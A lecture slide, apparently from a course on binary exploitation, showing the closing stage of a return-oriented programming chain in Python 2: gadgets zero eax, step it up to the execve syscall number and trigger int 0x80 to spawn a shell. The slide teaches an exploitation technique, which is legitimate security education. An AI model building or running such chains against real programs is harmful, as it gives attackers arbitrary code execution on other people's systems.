\frametitle{Working example: Putting it together, init params, syscall}
    \begin{lstlisting}[style=code, language=python]
p += pack('<I', 0x080506c0) # xor eax, eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08082a9e) # inc eax ; ret
p += pack('<I', 0x08049b2a) # int 0x80
print p
    \end{lstlisting}
